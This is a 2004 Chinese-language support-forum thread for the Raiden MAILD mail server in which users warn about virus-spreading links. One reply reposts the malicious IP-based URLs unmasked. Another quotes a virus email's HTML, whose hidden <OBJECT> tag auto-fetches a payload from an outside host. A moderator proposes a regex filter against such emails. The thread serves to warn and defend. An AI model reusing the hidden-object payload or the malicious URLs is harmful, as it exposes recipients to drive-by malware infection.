挖靠...病毒網址

 
發表新主題   回覆主題    尊龍佈告欄 首頁 -> 雷電MAILD (mail server)
上一篇文章 :: 下一篇文章  
發表人 內容
Samara
獅王
獅王


註冊時間: 2002-06-13
文章: 695
來自: 中華民國

發表發表於: 星期五 三月 19, 2004 11:04 am    文章標題: 挖靠...病毒網址 引言回覆

有小心別中毒...

http://24.222.194.2x5:81/082461.php
http://65.50.143.1x3:81/911595.php
http://69.162.96.6x:81/037309.php
http://68.67.237.2x6:81/098289.php
http://24.247.1x4.252:81/352325.php
http://24.143.7.1x:81/767920.php
_________________
Raiden MAILD 1.9.12 Build8 商業版
Windows XP Pro (Service Pack 2)
Intel-P4 2.41CGHZ 1G D-RAM
Symantec AntiVirus Corporate Edition
-------------------------------------------
回頂端
檢視會員個人資料 發送私人訊息
HAHAHA
獅王
獅王


註冊時間: 2001-11-23
文章: 725
來自: 台灣 , 中華民國

發表發表於: 星期五 三月 19, 2004 11:27 am    文章標題: Re: 挖靠...病毒網址 引言回覆

http://24.222.194. 255:81/082461 .php
http://65.50.143. 163:81/911595 .php
http://69.162.96. 67:81/037309 .php
http://68.67.237. 226:81/098289 .php
http://24.247.1 74.252:81/352325 .php
http://24.143.7. 15:81/767920 .php
把它加個空白吧, 因為一定會有人誤按... :p
_________________
忙碌中...
已經成了路人甲...
回頂端
檢視會員個人資料 發送私人訊息
awia0002
六段
六段


註冊時間: 2002-04-19
文章: 135
來自: 台灣 , 中華民國

發表發表於: 星期五 三月 19, 2004 11:38 am    文章標題: @@".... 引言回覆

現在病毒發展還真是蓬勃...不過 加上反查 就比較不會收到這類的病毒信
看來 內文過濾器 又要加上PHP一筆囉
不過 昨天早上看到一封 心理測驗的信 上面的文字是 測看看很準喔 文字裡面超連結是病毒網址 看信如果不小心 就中標了....
_________________
*有問題請附上詳細網域跟資訊會更快了解你的問題
你的問題搞不好已經有人問過.不妨先用"搜尋"會更快解決你的問題*
# 作業系統WinXP
# 是否使用 NAT 否
# 是否使用防火牆軟體 [ ] 是 [ PCC2004]
# 是否使用防毒軟體 [ ] 是 廠牌 PCC2004
# 使用網路 seednet 2m/384 dhcp
# 若與 FTP CLIENT 有關連 , 使用之 FTP CLIENT 種類 [ ffftp] , 版本 [ 1.92]
MAILD 1.9063
FTPD 2.4v 1230
HTTPD v1.077a
DNSD 1.201
回頂端
檢視會員個人資料 發送私人訊息 參觀發表人的個人網站
Samara
獅王
獅王


註冊時間: 2002-06-13
文章: 695
來自: 中華民國

發表發表於: 星期五 三月 19, 2004 12:30 pm    文章標題: Re: @@ 引言回覆

[quote="awia0002"]現在病毒發展還真是蓬勃...不過 加上反查 就比較不會收到這類的病毒信
看來 內文過濾器 又要加上PHP一筆囉
不過 昨天早上看到一封 心理測驗的信 上面的文字是 測看看很準喔 文字裡面超連結是病毒網址 看信如果不小心 就中標了.... :o[/quote]

此信並非有連結而是自動直接幫你連接下載

<html>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii">
<body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://65.50.143.163:81/911595.php">
</OBJECT></body></html>
_________________
Raiden MAILD 1.9.12 Build8 商業版
Windows XP Pro (Service Pack 2)
Intel-P4 2.41CGHZ 1G D-RAM
Symantec AntiVirus Corporate Edition
-------------------------------------------
回頂端
檢視會員個人資料 發送私人訊息
awia0002
六段
六段


註冊時間: 2002-04-19
文章: 135
來自: 台灣 , 中華民國

發表發表於: 星期五 三月 19, 2004 1:04 pm    文章標題: @@"... 引言回覆

看來遇到的是不一樣的.這個更為恐怖..... 真是要多多小心了
回頂端
檢視會員個人資料 發送私人訊息 參觀發表人的個人網站
Arnor
究極の素還尊
究極の素還尊


註冊時間: 2001-11-07
文章: 13011
來自: TAIWAN

發表發表於: 星期五 三月 19, 2004 4:54 pm    文章標題: Re: @@ 引言回覆

Samara 寫到:
awia0002 寫到:
現在病毒發展還真是蓬勃...不過 加上反查 就比較不會收到這類的病毒信
看來 內文過濾器 又要加上PHP一筆囉
不過 昨天早上看到一封 心理測驗的信 上面的文字是 測看看很準喔 文字裡面超連結是病毒網址 看信如果不小心 就中標了....


此信並非有連結而是自動直接幫你連接下載

<html>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii">
<body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://65.50.143.163:81/911595.php">
</OBJECT></body></html>


好險.
今天我也有收到, 好險我只是用電郵尖兵看個前100行...
就把它殺掉了..

我的建議是內文過濾可以利用 PCRE 加上
<OBJECT (.)*(\r\n)*</OBJECT>
來濾掉一切信內有使用 <OBJECT> 語法的信
_________________
*若是想問問題的話, 請務必不要塗改任何 IP, 網域資料, 您若不願貼上IP或網域, 請改以電子郵件來詢問. 謝謝您的配合.*
*若是回報疑似軟體的運行或邏輯或資料處理有誤的問題, 小弟很樂意去了解您的情況, 但請務必以最新版來做回報, 如果以郵件詢問, 請參考 http://www.raidenmaild.com/tw/feedback.html 的說明, 最好標題加個 RaidenMAILD 字樣, 才不致會遺漏了您的信唷. 謝謝您的配合^^*
*在版上發文請遵守網路禮儀, 並請持著虛心敘述問題請教他人, 凡發現違反的文, 均一律刪除為優先, 不另行通知喔.
*與使用者教學相長腦力激盪是我輩成就感的來源, 誠心希望您能不吝指教.
*雷電MAILD 知識庫文件 http://www.raidenmaild.com/tw/kb/

素還尊
Team John Long.
Email: [email protected]
公司網站 http://www.raidenmaild.com/company/
回頂端
檢視會員個人資料 發送私人訊息 發送電子郵件
從之前的文章開始顯示:   
發表新主題   回覆主題    尊龍佈告欄 首頁 -> 雷電MAILD (mail server) 所有的時間均為 台北時間 (GMT + 8 小時)
1頁(共1頁)

 
前往:  
無法 在這個版面發表文章
無法 在這個版面回覆文章
無法 在這個版面編輯文章
無法 在這個版面刪除文章
無法 在這個版面進行投票


Powered by phpBB © 2001-2007 phpBB Group